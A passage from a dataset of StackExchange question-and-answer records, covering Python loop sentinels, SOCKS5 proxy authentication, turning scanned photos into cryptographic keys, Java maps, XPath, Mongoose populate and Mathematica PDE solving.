support?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I check if my loop never ran at all?\n\nQuestion: How do I check if my loop never ran at all?\nThis somehow looks too complicated to me:\n<code>x = _empty = object()\nfor x in data:\n ... # process x\nif x is _empty:\n raise ValueError(\"Empty data iterable: {!r:100}\".format(data))\n<\/code>\nAin't there a easier solution?\nThe above solution is from curiousefficiency.org\nUpdate\n\ndata can contain <code>None<\/code> items.\ndata is an iterator, and I don't want to use it twice.\nComment: If `data` is a list, why not use `if not data:`?\nComment: Is `data` a list or other such container?\nComment: Why do you think this is too complicated? It's straightforward and readable.\nComment: @H\u00e5kenLid Many reasons make the quoted code complicated: (1)\u00a0You have to read and keep in mind the first line without understanding its purpose yet. (2) The loop normally changes `x`, which is unusual since we just set `x`: what is going on? (3) The test at the end does not work if the last element of `data` is `object()`: is this intended? can this happen? are we really testing for the emptiness of `data`? (4) The test intended to say \"is data empty \" actually reads \"is x empty\". Another reason why it is complicated is that there is a simpler solution (see my answer). :)\nComment: As pointed out by @H\u00e5kenLid, (3) is actually not a problem, because `object()` creates a new object (it's not a singleton).\nAnswer: By \"never ran\", do you mean that <code>data<\/code> had no elements?\nIf so, the simplest solution is to check it before running the loop:\n<code>if not data:\n raise Exception('Empty iterable')\n\nfor x in data:\n ...\n<\/code>\nHowever, as mentioned in the comments below, it will not work with some iterables, like files, generators, etc., so should be applied carefully.\nComment: That will work with some iterables, but not all (e.g. 
a file or a generator function\/expression).\nComment: If `data` is a sequence, this'll work - if it's an `iterable` it'll always be true even if it'll never yield any elements\nComment: I think checking for a sentinel value is okay; not sure what problem the OP has with it.\nComment: Since the updated question mentions that it is using an *iterator*, this solution does not work.\nAnswer: The original code is best. \n<code>x = _empty = object()\n<\/code>\n<code>_empty<\/code> is called a sentinel value. In Python it's common to create a sentinel with <code>object()<\/code>, since it makes it obvious that the only purpose of <code>_empty<\/code> is to be a dummy value. But you could have used any mutable, for instance an empty list <code>[]<\/code>.\nMutable objects are always guaranteed to be unique when you compare them with <code>is<\/code>, so you can safely use them as sentinel values, unlike immutables such as <code>None<\/code> or <code>0<\/code>.\n<code>>>> None is None\nTrue\n>>> object() is object()\nFalse\n>>> [] is []\nFalse\n<\/code>\nComment: I really don't agree that the original code is best: my comment to the question explains why (essentially: the code *is* complicated, and there is a much cleaner and clearer solution).\nAnswer: The following simple solution works with any iterable. It is based on the idea that we can check if there is a (first) element, and then keep iterating if there was one. The result is much clearer:\n<code>import itertools\n\ntry:\n first_elmt = next(data)\nexcept StopIteration:\n raise ValueError(\"Empty data iterator: {!r:100}\".format(data))\n\nfor x in itertools.chain([first_elmt], data):\n \u2026\n<\/code>\nPS: Note that it assumes that <code>data<\/code> is an iterator (as in the question). If it is merely an iterable, the code should be run on <code>data_iter = iter(data)<\/code> instead of on <code>data<\/code> (otherwise, say if <code>data<\/code> is a list, the loop would duplicate the first element).\nComment: `object()` creates an unique object every time, so that wouldn't be a problem.\nComment: You're right, my bad. I removed the related comment.\nAnswer: I propose the following:\n<code>loop_has_run = False\nfor x in data:\n loop_has_run = True\n ... # process x\nif not loop_has_run:\n raise ValueError(\"Empty data iterable: {!r:100}\".format(data))\n<\/code>\nI contend that this is better than the example in the question, because:\n\nThe intent is clearer (since the variable name specifies its meaning directly).\nNo objects are created or destroyed (which can have a negative performance impact).\nIt doesn't require paying attention to the subtle point that <code>object()<\/code> always returns a unique value.\n\nNote that the <code>loop_has_run = True<\/code> assignment should be put at the start of the loop, in case (for example) the loop body contains <code>break<\/code>.\nComment: This is not bad, but this has the unfortunate side effect of forcing a useless assignment at each iteration but the first one (which makes your second point about the penalty of creating an object moot). There is no need for such a penalty (see my answer, which is what I would use in real life :).\nComment: @EOL: In general the penalty of an assignment is *much* cheaper than the penalty of creating\/destroying an object. Obviously the effect of this on actual runtime will vary, especially depending on the typical number of iterations of the loop (always measure!). 
I believe your solution implicitly performs allocation due to the call to `itertools.chain`, but I haven't confirmed this.\nComment: Agreed, the existence of a performance penalty compared to the solution quoted in the question depends on the size of the data. Now, this does not change the fact that doing the assignment over and over in the loop is wasteful and algorithmically dubious\u2014again, I don't think it's too bad, though. :) I'm not sure what \"allocation\" that would be in my solution you can be referring to: maybe the creation of a list?\nAnswer: You can add a <code>loop_flag<\/code> default as False, when loop executed, change it into True:\n<code>loop_flag = False\nx = _empty = object()\n\nfor x in data:\n loop_flag = True\n ... # process x\n\nif loop_flag:\n print \"loop executed...\"\n<\/code>\nComment: Not all that helpful either.\nComment: Why have both a test on `x` and a `loop_flag`? This is unnecessarily redundant.\nComment: loop_flag=True should be the first statement. Otherwise a `continue` in \"process x\" would create unintended results.\nAnswer: The intent of that code isn't immediately obvious. Sure people would understand it after a while, but the code could be made clearer.\nThe solution I offer requires more lines of code, but that code is in a class that can be stored elsewhere. In addition this solution will work for iterables and iterators as well as sized containers.\nYour code would be changed to:\n<code>it = HadItemsIterable(data)\nfor x in it:\n ...\nif it.had_items:\n ...\n<\/code>\nThe code for the class is as follows:\n<code>from collections.abc import Iterable\nclass HadItemsIterable(Iterable):\n\n def __init__(self, iterable):\n self._iterator = iter(iterable)\n\n @property\n def had_items(self):\n try:\n return self._had_items\n except AttributeError as e:\n raise ValueError(\"Not iterated over items yet\")\n\n def __iter__(self):\n try:\n first = next(self._iterator)\n except StopIteration:\n if hasattr(self, \"_had_items\"):\n raise\n self._had_items = False\n raise\n self._had_items = True\n yield first\n yield from self._iterator\n<\/code>\nAnswer: What about this solution?\n<code>data=[]\n\ncount=None\nfor count, item in enumerate(data):\n print (item)\n\nif count is None:\n raise ValueError('data is empty')\n<\/code>\n","meta":{"source":"stackoverflow","title":"How do I check if my loop never ran at all?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What's the point in a proxy server authorizing\/authenticating clients?\n\nQuestion: I've implemented a SOCKS5 proxy library, but I just don't get the point of authenticating (or encrypting) connections, which the RFC (1928) seemed pretty adamant about. Isn't anonymity the whole idea of a proxy?\nI also understand that encrypting traffic between the client and server is possible, but that only covers the client-server half of client-server-destination path: isn't that kind of pointless? Shouldn't the encryption (if it's absolutely necessary) run end-to-end instead?\nAnswer: This is really two questions, but eh...\nWhat's the point of proxy authentication?\nContrary to what you seem to believe, there are many reasons beyond anonymity to use a proxy (and if you want good anonymity, you should use something like Tor rather than a single proxy). 
A few of those reasons:\n\nBypassing geographical or IP-based restrictions.\nUsing the proxy as a bridge between the network you're on and one you want to access (for example, getting from an internal corporate or cloud network out to the Internet, or the reverse).\nUsing a proxy for monitoring, logging, or filtering network traffic (for your own security, or for the security\/control of a company or other entity that wants to limit what you can access on\/from its network).\nUsing a proxy for intercepting or modifying network traffic (for security testing, or for tampering with network traffic).\n\nFor many of these purposes, there are good reasons to use authentication. For example, a geo-filtering bypass proxy may be offered as a commercial service, and they want to ensure that only paying users can access the proxies they provide. A corporate proxy wants to ensure that only authorized employees are able to access its network, and possibly also to know which employee is using a particular machine for monitoring and logging purposes. Somebody using a network testing proxy that is opened to other devices on the network may want to make sure that only their own authorized devices can connect to the proxy, rather than allowing arbitrary network users to connect and send requests either directly to the proxy or from their computer.\nAdditionally, having an open proxy is just risky. For example, suppose somebody used an open proxy that you run to send death threats or upload child porn or something else illegal like that, and it gets traced back to your IP address. That's not a good situation to be in (though I'm not a lawyer and am not sure exactly how much legal jeopardy you might be in there), especially if you don't have any way to demonstrate it was somebody else (such as a proxy's authentication logs).\n\nShouldn't encryption, if used, be end-to-end?\nIn general, yes, but that's not always practical and there might be reasons to want to separately encrypt the client-proxy traffic anyway. There's no reason that you can't run end-to-end encrypted traffic, such as HTTPS, through a proxy where your encryption to the proxy is itself encrypted. In fact, if you were using the proxy to conceal your network activity from your ISP or similar, you would absolutely want to do this (otherwise the ISP would be able to see your DNS lookups, the domain names of the sites you wanted to connect to, the amount of network traffic you exchange in each direction with each site and at what times, and so on). Encrypting the connection to the proxy is also obviously helpful any time you want secure authentication, although there are ways to do reasonably-secure authentication over insecure connections (such as SRP).\nAlso, encrypting the connection only between you (the client) and the proxy is still better than no encryption at all, which would be the case when connecting to a server that doesn't support encryption (such as one that only supports HTTP or FTP, for example). 
A local network attacker still can't see (or modify) what you're doing (as they could if the proxy connection was unencrypted), even though the proxy server and anybody downstream of it can.\n","meta":{"source":"security.stackexchange","title":"What's the point in a proxy server authorizing\/authenticating clients?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can an arbitrary physical image be a key?\n\nQuestion: Assume an arbitrary secret physical image\u00b9, such as a privately made chemical Polaroid\u2122 similar to this\n\nIs there a feasible and secure way that this physical image could be used as cryptographic key, functionally equivalent to an AES key or RSA private key, without \"accompanying\u00b2 other digital data\" beyond the physical image? We'll assume a scanner digitizes the physical image at each use, and all the rest is handled digitally.\nWe may want to distinguish 4 use cases\n\nSymmetric message encryption and decryption\nSymmetric message authentication and verification\nAsymmetric decryption of a ciphertext for a secret message, encrypted using a previously made public key\nAsymmetric\/Digital signature of a message, publicly verifiable using a public key assumed authentic.\n\nFor asymmetric, there is the issue that contrary to traditional private keys, the physical image can't contain the public key, which needs to be prepared separately (from an independent scan).\nAssume we want at least\u00b3 CPA security and EUF-CMA signature security; and we are ready to tolerate that cryptograms and public keys are large, the algorithms slow, and that legitimate decryption or signature verification fails with some low yet noticeable probability.\nIf that's not possible (I don't know a method\u2074), can the necessary \"accompanying\u00b2 other digital data\" be public? Does it's integrity need to be trusted? How large does it needs to be for various kinds of physical image, perhaps including biometric data (assumed private)? What standard name(s) does this \"other data\" have?\nLate update (2021-09-08): I now wonder if for symmetric crypto we could use the combination of\n\nimage preprocessing as in this answer;\nRan Canetti, Benjamin Fuller, Omer Paneth, Leonid Reyzin, Adam Smith: Reusable Fuzzy Extractors for Low-Entropy Distributions, originally in proceedings of EuroCrypt 2016;\nAES-GCM with the \"helper\" in the above passed as associated data, and key the \"extract\".\n\n\u00b9 The question was initially asked for biometric data assumed private and acquired in a socially acceptable way. Say, a retina scan, and there's an unfalsifiable method to recognize safe retina scanners from those that will keep a copy of the scan or burn the user blind, and eye doctors did not keep archives, and key rotation was unnecessary. The main reason I mentioned biometry was to repel it for use as straight replacement of a cryptographic key, with hard security argument rather than just poorly meeting the functional goals.\n\u00b2 By \"accompanying\" I mean kept along the image, with the same secrecy and integrity. The question is thus excluding e.g. making marks on the physical image. But embedding in the ciphertext some data generated from a scan of the physical image would be game.\n\u00b3 We'd additionally like that encryption remains secure under the assumption that an adversary can submit arbitrary ciphertexts to a decryption oracle, and gain knowledge of if the decryption was successful or not. 
This is tantamount to CCA security.\n\u2074 Main problem is that the outcome of a scan varies, and no algorithm can fix (in both senses of the term) it (at least, for all arbitrary images) into something directly usable as key in a standard cryptosystem, without some \"other data\". I suspect (robust?)fuzzy extractors may help to a degree, but I admit that my knowledge about them is itself fuzzy. It thus seems impossible to define a function that turn scans into a key for a standard unmodified symmetric cryptosystem like AES-CTR or AES-GCM, and have it secure and working acceptably reliably. To illustrate the difficulty I scanned a photo (not the one above), 5 times, using the same scanner with same setting (B&W 8-bit), just moving the image at each scan and manually moving a selection rectangle of constant size. Here are the scans. I believe that any deterministic algorithm that turns these scans into a stable key will either need to contain data extracted from one of the scans in order to get stable output for the others (and won't work reliably for most other set of scans made from different images), or will have insufficient entropy in it's output.\nComment: Previous comment were interesting, but outdated, or growing lengthy. They have been [moved to chat](https:\/\/chat.stackexchange.com\/rooms\/128733\/discussion-on-question-by-fgrieu-can-a-physical-image-be-a-key), which is appropriate for discussion.\nComment: How much tolerance is needed? When I understand you right, we may not assume that it is possible to take the the exact same picture again\nComment: @jjj: I don't know how to simply express \"how much tolerance is needed\". Broadly speaking, I want something secure and with acceptable reliability. Perhaps the later means failure rate of <1% on first try, down to 0.1% with a reiteration of the second scan. For the scan stability, see [this](https:\/\/chat.stackexchange.com\/transcript\/message\/59062904#59062904) [updated, link further updated].\nAnswer: Please let me confirm the major problem to be noisy reading of private key information, so that most (all well-known) crypto schemes would fail. Error correction is the well-established area having proper math\/tools to handle such a problem.\nFor a \"noisy private key\" signature, one would avoid actual correction, concentrating on \"small distance\/metric\" decisions over private data while verification. One particular error correction scheme, Goppa codes, might be convenient to combine with Schnorr protocol to achieve such a signature, IACR 2008\/359.\nSequence similarity might be another metric sometimes called Short Tandem Repeat (STR), and there are some forensic STR-identification databases around. One could approach such a metric with a sequence characteristic polynomial model and insertion\/deletion counting (set membership). Having sequences replaced with polynomials, one would combine it with Schnorr achieving a proof of DNA similarity, IACR 2008\/357.\nPolynomial graph representation was a precursor for sequence characteristic polynomial (IACR 2008\/363 and MFCS 2012), achieving graph isomorphism, hamiltonicity and coloring proofs with \"large\" challenges (not binary like 0 or 1); no errors or similarity metrics yet.\nSecret polynomials would invite a Schnorr-like protocol with higher degree (more that linear, degree-1) polynomials in the challenge of verifier. 
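As a reminder of the baseline being generalized here (a standard recap added for context, not part of the cited papers): in plain Schnorr identification over a group of prime order $q$ with generator $g$, the prover holding secret $x$ and public key $y = g^x$ commits $t = g^r$ for random $r$, receives a challenge $c$, and responds with the degree-1 polynomial in the challenge\n$$ s = r + c x \\bmod q, $$\nafter which the verifier checks $g^s = t \\cdot y^c$. The proposals above replace that degree-1 response with polynomials of higher degree in the verifier's challenge.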
Finally, all the results mentioned would require some computer algebra helper\/library implemented to handle that higher-degree polynomials.\nComment: Well, encryption with \"noisy keys\" looks more complex than signature\/identification to me. It would probably mean implementing full error correction over private data somehow; it was not my point (priority).\nComment: Thanks for the confirmation and references to your work in the domain. I'd appreciate if you could clarify if you consider the answer to my main\/first question (the possibility to avoid \"extra data\" entirely) is yes or no, perhaps distinguishing symmetric encryption, public-key encryption, and signature if needed. Also, if \"extra data\" is needed for \"Error correction\", it's less clear if it is only that or if there's some crypto on top; if it can be public; if it must be trusted to avoid attack; and if there's a standard name for it.\nAnswer: If you use at least 7 riffle shuffles to randomize a deck of 52 cards, and take a photo of the deck spread out just enough such that each letter\/suite is clearly visible, that will give you a (log2 (52!)) == 225 bit secret key for use in symmetric encryption. Then you could use key stretching to take you a little higher if necessary.\nYou could come up with similar schemes as long as you have enough control over the items being photographed to ensure there was no ambiguity. For example, you could drop a box of toothpicks on the floor, and then manually adjust each toothpick so it is roughly only at a 0, 45, or 90 degree angle prior to taking a photo. Key extraction would then use the angle of each toothpick to the nearest 45 degrees.\nComment: That's true. We can also encode a key into a QR-code. Neither really answers the question as I intended it. I have now added \"arbitrary\"\nComment: @fgrieu I agree it can't be used on an arbitrary image. However, it does solve the problem of allowing a photo to be taken without use of computer assistance, which would not be the case if you simply photographed a QR code.\nComment: Good point! It's an interesting way to manually generate and encode a key, and pass it as an image that is then machine-readable.\nAnswer: The challenging part is mostly about image processing, and not a lot about crypto.\nYou want to extract from the image sufficient entropy in a reliable fashion.\nIt has a lot to do with how you use the image and your adversary model.\nIf your adversary knows nothing at all about the image, some simple coarse features could be sufficient, if your adversary knows a lot about the image, e.g has gotten a glance at it, or knows aproximately where it was taken you need to be more careful on what information is extracted from the image and will need to use finer grained image features which will be hard to extract in a stable fashion.\nIf each time the image is used it is scanned in the same high quality scanner, and between usages it is kept safely so it doesn't fade, wrinkle or accumulate dust it would be easier to get scans very close to each other and have only simple auto alignment and discretization (spatial and color) to get almost the same bit sequence each time.\nThen the question is what the error model we have for the scan results? Do we expect gaussian noise? salt and peper? alignment noise? rotation? addition of large continious pieces of noise? 
lighting noise?\nEach type of noise can be dealt with differently.\nA general outline for a solution: We use image processing techniques to minimize the noise to move to a representation which eliminates most of them then you limit the space to only certain valid points and pick the nearest valid point to what we have to bring noise down to zero.\nWe will discretize aggessively enough and pick sparse enough valid points to allow us to get to zero noise reliably. At this point we should still have much more than the required key length but in a space still closely related to the original image and as such the bits will be be biased and correlated.\nApplying a cryptographic hash to that data should sort it out and allow us to have sufficient high quality key material derived reliably, and get the same key exactly any time you scan. This could be used as e.g an AES key.\nIf you want to create an RSA key you will need many more random bits. You can however extract as many bits as you can extract while still reliably getting same bits every time and use that to seed a cryptographic PRNG and use it to generate an RSA private key.\nEdit: I didn't try to implement a full solution, but I did open a notebook and play with the noise model suggested, gaussian noise and shifts I believe are corrected easily, so I checked what happens if I rotate the image (with fancy interpolations) by 2 degrees and rotate back by 1.8 degrees I got a maximal diff (on the image above) of 33%, this is supportaive of my claim that by identifying best counter rotation and shift, lowering resolution and quantizing aggressively ignoring edges we should be able to get 1-2 bits per channel per ~25 pixel regions. For the above image it comes out at least 36K bits, and after hashing I bet this will have 128 bits of actual entropy\nEdit2: I downloaded the provided images of grey scale scans, and played with them, I semi-automatically aligned at rotated the first two image.\n<code>img = io.imread(\"scans\/scan078.tif\")\nimg2 = io.imread(\"scans\/scan079.tif\")\nimgr = transform.rotate(img,angle = -0.78)\nimgr2 = transform.rotate(img2,angle = -0.805)\ntr1=transform.rescale(imgr[:-10,:-6],0.1)[20:-20,20:-20]\ntr2=transform.rescale(imgr2[10:,6:],0.1)[20:-20,20:-20]\n<\/code>\nThis reads rotates each aligns and crops, downsamples 10x and crops to get rid of edges which may have artifacts.\nThis gives a Maximal difference of less than 6% per pixel value. Which is pretty good. However this 6% diff can easily be around any cut-off we choose so even quantizing aggressively doesn't give 0 errors.\n<code>bin1 = tr1> 0.5\nbin2 = tr2> 0.5\n<\/code>\nThis gave a difference in 103 bits out of 27248 bits or 0.37% These errors appear to be reasonably spread out.\nThis aggressive resizing and quantizing looses a lot of information but we probably still have enough.\nThis is what the image looks like:\n\nThe errors are fairly well spread out(and we can always apply a fixed permutation or use larger symbols if needed). So now we can apply any error correction step (e.g Reed solomon) we will just take the decoding step (didn't actually do this) and we should get the same output from either image with high likelyhood and still have ~20K bits.\nIf we down scale 5x instead of 10x we get 816 differing bits. but get 4x as many bits, at 0.6% difference. Can play with this and find optimum.\nWe can also probably do better at the quantization step and preserve more information reliably. 
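To make the downscale-quantize-hash chain concrete, a rough sketch of the idea (illustrative only and untested on the scans above; scikit-image, NumPy and hashlib are assumed available, and the error-correction decode is left as a placeholder comment):\n<code>import hashlib\nimport numpy as np\nfrom skimage import io, transform\n\ndef scan_to_key(path, angle, scale=0.1, crop=20, cutoff=0.5):\n    # align, downsample and crop away unreliable edges, as in the experiment above\n    img = transform.rotate(io.imread(path), angle=angle)\n    small = transform.rescale(img, scale)[crop:-crop, crop:-crop]\n    # aggressive 1-bit quantization of each low-resolution pixel\n    bits = (small > cutoff).astype(np.uint8)\n    # placeholder: an error-correction decode step belongs here, so that\n    # two noisy scans map to the same codeword before hashing\n    packed = np.packbits(bits.flatten())\n    # hashing removes bias and correlation and yields fixed-size key material\n    return hashlib.sha256(packed.tobytes()).digest()\n\nkey = scan_to_key('scan078.tif', angle=-0.78)  # filename and angle taken from above\n<\/code>\nWithout the error-correction step the two scans will of course still differ in a few bits and hash to different keys, so this only illustrates the shape of the pipeline. The fixed 0.5 cutoff also shares the limitation just mentioned: a badly exposed scan collapses to a single value.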
The aggressive quantization I used will work only for reasonably balanced photos, an over exposed picture will come out all a single value. We could add preprocessing to handle this scenario.\nComment: Comments are not for extended discussion; this conversation has been [moved to chat](https:\/\/chat.stackexchange.com\/rooms\/129266\/discussion-on-answer-by-meir-maor-can-an-arbitrary-physical-image-be-a-key).\n","meta":{"source":"crypto.stackexchange","title":"Can an arbitrary physical image be a key?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Java equivalent to PHP's multidimensional arrays\n\nQuestion: I'm trying to create \"anonymous\" arrays of datas, with non-numeric keys, the same way I could do it in PHP, just like that :\n<code>$datas = [\n [\n 'firstname' => 'Sam',\n 'lastname' => 'Winchester',\n 'job' => 'Hunter',\n 'age' => 30\n ],\n [\n 'firstname' => 'Dean',\n 'lastname' => 'Winchester',\n 'job' => 'Hunter',\n 'age' => 35\n ],\n];\n<\/code>\nI'd like to know if I can do that without creating a specific class or something like that.\nI found some solutions using maps but it's only working with 2 fields, not more.\nThanks.\nAnswer: There is no direct equivalent in Java. You would have to create a class <code>Person<\/code> with 4 fields <code>firstName<\/code>, <code>lastName<\/code>, <code>job<\/code> and <code>age<\/code>, and then use a <code>Person[]<\/code>.\nAnswer: @Paul Boddington 's answer is great too but if you want to have a more general solution, you could create a list of hashmaps.\n<code>List<HashMap<String, String>> data = new ArrayList<>(); \/\/ Diamond expression\nList<HashMap<String, String>> data = new ArrayList<HashMap<String, String>>(); \/\/ non diamond\n<\/code>\nAdding your data of your PHP array into our solution\n<code>HashMap<String, String> personOne = new HashMap<String, String>();\npersonOne.put(\"firstname\", \"Sam\");\npersonOne.put(\"lastname\", \"Winchester\");\n...\ndata.add(personOne);\n<\/code>\nVoila.\nComment: I'm afraid that it wouldn't work since I have different types for each field, such as `int` for the `age` field.\nComment: @AntoineB for dealing with different types of data just declare them as Object like this: `HashMap`\n","meta":{"source":"stackoverflow","title":"Java equivalent to PHP's multidimensional arrays","dup_signals":{}},"subset":"stackexchange"} +{"text":"XPath expression -hierarchy\n\nQuestion: <code> <div class=\"summary-item\">\n <label >Price<\/label>\n <div class=\"value\">\n 0.99 GBP\n <\/div>\n <\/div>\n\n <div class=\"summary-item\">\n <label >Other info<\/label>\n <div class=\"value\">\n All languages\n <\/div>\n <\/div>\n<\/code>\nI am trying to get the \"0.99 GBP\" using an XPath expression, so far I have reached the label using this (note there is another class by the name summary-item, therefore I need to uniquely identify with the label name Price) \n<code>sel.xpath('\/\/*\/div[@class=\"summary-item\"]\/label[text()=\"Price\"]').extract()\n<\/code>\nHowever, I am unable to get to the class, I tried using following-sibling, but I did not succeed, any help will be appreciated. \nAnswer: The existence of child nodes can be part of the predicate. 
Put the test for <code>label<\/code> into a predicate for the parent, either as a separate predicate (adding the target node as well):\n<code>\/\/div[@class=\"summary-item\"][label[text()=\"Price\"]]\/div[@class=\"value\"]\n<\/code>\nor joined with <code>and<\/code>:\n<code>\/\/div[@class=\"summary-item\" and label[text()=\"Price\"]]\/div[@class=\"value\"]\n<\/code>\n(Note you don't need <code>\/\/*\/div<\/code> at the start.)\nYou could use <code>following-sibling<\/code> if you wanted, it would look like this:\n<code>\/\/div[@class=\"summary-item\"]\/label[text()=\"Price\"]\/following-sibling::div[@class=\"value\"]\n<\/code>\n(here the <code>label<\/code> div isn't part of the predicate).\nOne more thing to be aware of, using XPath to select HTML classes doesn't work the same as using CSS \u2013 XPath will only match the exact string whereas CSS matches even if the element is in more than one class. In this case it works out okay but you should watch out for it. Search StackOverflow if it will be an issue, there are a few answers descibing it.\n","meta":{"source":"stackoverflow","title":"XPath expression -hierarchy","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to fetch documents within a fetched document in promise\n\nQuestion: <code>{\n \"status\": \"SUCCESS\",\n \"ASANA\": {\n \"benefits\": [\n \"5b185c59e7179a074bebfb13\"\n ],\n \"steps\": [\n \"5b186f46e7179a074bec04f5\",\n \"5b186e1be7179a074bec0402\"\n ],\n \"_id\": \"5b11a58d3d62f90c1c717913\",\n \"asanaName\": \"Shavasana\",\n \"asanaDescription\": \"useful for body relaxation\",\n \"__v\": 0\n }\n}\n<\/code>\nHere I have fetched one Asana and how to get benefits collection using that <code>id<\/code>. Below code is to fetch Asanas.\n<code>const fetchAllAsanasDao = () => {\n return new Promise((resolve, reject) => {\n asanas\n .find({})\n .then((asanasResult) => {\n asanas\n .find({})\n resolve(asanasResult);\n })\n .catch((error) => {\n reject(error);\n });\n });\n}\n<\/code>\nComment: What is this? Are you using mongoose? The structure looks like a document out of mongoose. If so then please show the relevant schema and wherever \"benefits\" are stored. You're also wrapping promises with promises for no reason. Please give more detail in the question at any rate because this is really unclear and if you are actually using mongoose and MongoDB it's inappropriately tagged as well.\nComment: I am using mongoose. 
and i got the solution.thank you\nAnswer: const fetchAllAsanasDao = ({}, {}, query) => {\n return new Promise((resolve, reject) => {\n asanas\n .find({}, {}, query)\n .populate({ path: 'benefits', select: 'benefitsDescription', })\n .populate({ path: 'asanaResources', select: 'asanaResourcesPath' })\n .exec()\n .then((asanasResult) => {\n resolve(asanasResult);\n })\n .catch((error) => {\n reject(error);\n });\n });\n}\n","meta":{"source":"stackoverflow","title":"how to fetch documents within a fetched document in promise","dup_signals":{}},"subset":"stackexchange"} +{"text":"Solving systems of partial differential equations with functions of different number of variables\n\nQuestion: I am trying to solve the following system of two partial differential equations\n$\\partial_t G(x,y,t) + \\partial_x G(x,y,t)+\\partial_y G(x,y,t) = -i\\left[f(x,t) + f(y,t)\\right] $\n$\\partial_t f(x,t) + \\partial_x f(x,t) = f(x,t) - iG(x,0,t)$\nwith initial conditions $f(x,0)=0$ and $G(x,y,0) = G_0(x,y)$ where $G_0$ is a given function (e.g., a double Gaussian packet in the x-y plane)\nI tried the following code:\n<code>L = 1; T = 1; x0 = -L\/4; sigma = L\/30; \nsol = NDSolve[{\n D[G[x, y, t], t] == -(D[G[x, y, t], x] + D[G[x, y, t], y]) - I*(f[x, t] + f[y, t]),\n D[f[x, t], t] == -D[f[x, t], x] + f[x, t] - I*(G[x, 0, t]),\n G[x, y, 0] == Exp[-((x - x0)\/(Sqrt[2]*sigma))^2 - ((y - x0)\/(Sqrt[2]*sigma))^2],\n f[x, 0] == 0\n },\n {G, f}, {x, -L\/2, L\/2}, {y, -L\/2, L\/2}, {t, 0, T},\n MaxSteps -> 500]`\n<\/code>\nBut I get the errors:\n<code>Function::fpct: Too many parameters in {x,y,t} to be filled from Function[{x,y,t},0][x,t].\n\nFunction::fpct: Too many parameters in {x,y,t} to be filled from Function[{x,y,t},0][-0.5,0.].\n\nFunction::fpct: Too many parameters in {x,y,t} to be filled from Function[{x,y,t},0][-0.5,0.].\n\nGeneral::stop: Further output of Function::fpct will be suppressed during this calculation.\n\nNDSolve::ndnum: Encountered non-numerical value for a derivative at y == 0.`.\n\nNDSolve::ndnum: Encountered non-numerical value for a derivative at y == 0.`.\n<\/code>\nAny suggestion on how to proceed?\nComment: The warning is probably because you forgot to `Clear[f]` first. Then you need to add proper artificial b.c. for your problem because otherwise we won't know what b.c. is added to `NDSolve`. (See [this post](https:\/\/mathematica.stackexchange.com\/q\/73961\/1871) for more information. ) The most troublesome part `f[x, t] + f[y, t]` still remains though, but I think it's not too hard to overcome. If you supplement proper b.c., I can have a try.\nComment: Hi, thanks for your answer. Using Clear[f] before the code did not remove the warning.\nRegarding the boundary conditions: I expect the initial \"pulse\" (in the xy plane) never to approach the boundaries, so probably the exact boundary conditions are not important. I think periodic boundary conditions should work, or whatever else you think it may be easy to implement.\nAnswer: First of all, I'd like to point out the warning <code>Function::fpct<\/code> is probably because you've executed <code>f = Function[{x, y, t}, 0];<\/code> and forgotten to <code>Clear[f]<\/code> then. This isn't the main issue, of course.\nThe main issue is, currently <code>NDSolve<\/code> can't handle equation system whose unknown functions are defined on different domains. (In your case, $G\\in [-\\frac{L}{2},\\frac{L}{2}]\\times[-\\frac{L}{2},\\frac{L}{2}]\\times[0,T]$ and $f\\in [-\\frac{L}{2},\\frac{L}{2}]\\times[0,T]$. 
) So let's discretize the system to an ODE system ourselves.\nI'll use <code>pdetoode<\/code> for the generation of ODEs.\nFirst, supplement b.c. to the system. Since you've mentioned b.c. isn't important here, I simply use zero Dirichlet b.c.:\n<code>L = 1; T = 1; x0 = -L\/4; sigma = L\/30;\ndomain = {-L\/2, L\/2};\n{eq1, eq2} = {D[G[x, y, t], t] == -(D[G[x, y, t], x] + D[G[x, y, t], y]) - \n I (f[x, y, t] + f2[x, y, t]), \n D[f[x, t], t] == -D[f[x, t], x] + f[x, t] - I (G2[x, t])};\n\n{ic1, ic2} = {G[x, y, 0] == \n Exp[-((x - x0)\/(Sqrt[2] sigma))^2 - ((y - x0)\/(Sqrt[2] sigma))^2], f[x, 0] == 0};\n\n{bc1, bc2} = {G[x, y, t] == 0 \/. Outer[{# -> #2} &, {x, y}, domain],\n f[x, t] == 0 \/. List \/@ Thread[x -> domain]};\n<\/code>\nNotice I've modified the form of PDE system a bit (<code>f[x, t] -> f[x, y, t]<\/code>, <code>f[y, t] -> f2[x, y, t]<\/code>, <code>G[x, 0, t] -> G2[x, t]<\/code> ) because <code>pdetoode<\/code> can't handle functions defined in different domains all in once, either.\nNext step is discretization. I've defined 2 functions <code>ptoofunc1<\/code> and <code>ptoofunc2<\/code> for the discretization of 2 domains.\n<code>points = 71; \ngrid = Array[# &, points, domain];\ndifforder = 4;\n(* Definition of pdetoode isn't included in this post,\n please find it in the link above. *)\n\nptoofunc1 = pdetoode[{G, f, f2}[x, y, t], t, {grid, grid}, difforder];\nptoofunc2 = pdetoode[{G2, f}[x, t], t, grid, difforder];\n\ndel = #[[2 ;; -2]] &;\nrule1 = {f[x_, y_][t_] :> f[x][t], f2[x_, y_][t_] :> f[y][t]};\nrule2 = G2[x_][t_] :> G[x, 0][t];\node1 = del \/@ del@ptoofunc1@eq1 \/. rule1;\node2 = del@ptoofunc2@eq2 \/. rule2;\nodeic1 = ptoofunc1@ic1;\nodeic2 = ptoofunc2@ic2;\n<\/code>\nNotice <code>points<\/code> should be an odd number, or <code>G[x, 0, t]<\/code> won't be properly handled.\n<code>del<\/code> is a function for deleting equations at boundary to \"make room\" for b.c.s because <code>ptoofunc1<\/code> and <code>ptoofunc2<\/code> generate equations for every grid points. <code>rule1<\/code> and <code>rule2<\/code> is for transforming <code>f2<\/code> and <code>G2<\/code> back to <code>f<\/code> and <code>g<\/code>.\n<code>diff = With[{sf = 1}, diffbc[t, sf]];\nodebc1 = diff@MapAt[del \/@ # &, ptoofunc1@bc1, {1}];\nodebc2 = diff@ptoofunc2@bc2;\n<\/code>\n<code>diff<\/code> is for transforming the disretized b.c. to (almost) equivalent ODEs. Well I admit the code above is a bit advanced, to have a better understanding for the whole process you may want to read this post.\nThe last step is to solve the system and rebuild the solutions to 2 interpolating functions:\n<code>sol = NDSolveValue[{ode1, ode2, odeic1, odeic2, 